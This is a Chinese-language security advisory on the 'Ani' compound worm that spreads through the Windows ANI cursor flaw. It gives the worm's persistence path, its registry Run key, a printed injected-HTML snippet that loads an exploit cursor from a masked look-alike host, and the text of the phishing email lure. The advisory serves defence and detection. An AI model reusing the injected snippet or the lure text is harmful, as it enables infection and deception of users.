国家计算机病毒应急处理中心通过对互联网的监测发现“艾妮”复合型病毒。该病毒通过微软Windows系统ANI（动态光标）文件处理的漏洞、感染正常的可执行文件和本地网页文件、发送电子邮件、和感染优盘及及移动存储介质等途径进行传播，病毒自我传播能力很强。并且感染该病毒后，会自动下载运行木马程序，造成较大危害。

该蠕虫先后出现很多变种，在出现后的短时期内迅速传播，遭受感染的用户难于彻底清除，给其工作带来诸多不便。

蠕虫情况分析如下：

病毒名称：Worm_MyInfect.af

中 文 名：“艾妮”

其他名称：I-Worm/AniLoad（江民）     　Worm.MyInfect （金山）       Worm.DlOnlineGames （瑞星）

病毒类型：复合型

感染系统：Windows 9X/ Windows ME/ Windows NT/ Windows 2000/

Windows XP/ Windows 2003/ Windows Vista

病毒特性：

1、生成病毒文件

病毒运行后，复制自身到下面目录：%SysDir%\sysload3.exe

2、修改注册表项

HKCU\Software\Microsoft\Windows\CurrentVersion\Run"System Boot Check"="%SysDir%\sysload3.exe"这样，病毒就可以随Windows系统启动自动运行。

3、感染系统中文件

它能感染本地磁盘和网络共享目录中的可执行文件和脚本文件。1） 感染可执行文件将被感染文件和病毒融合成一个文件(被感染文件贴在病毒文件尾部)完成感染。2） 脚本类文件在这些脚本文件尾加上如下注示 <script src=/upimg/allimg/070409/0527470.jpg')"><DIV style="CURSOR: url('http://****.microfsot.com/*.jpg')">以上两个图片链接利用了ANI漏洞，图片文件中含有溢出攻击代码，因此打开上面的Noindex.js网页时便会中毒。

4、下载指定网址文件

从指定网址下载木马程序和病毒升级程序。

5、通过电子邮件传播

病毒邮件特征如下：发件人： i_love_cq@sohu.com主题：你和谁视频的时候被拍下的？给你笑死了！正文：看你那小样！我看你是出名了！你看这个地址！你的脸拍的那么清楚！你变明星了！http://****.microfsot.com/***/134952.htm如果用户点击了以上带有病毒的网页，就会遭受感染。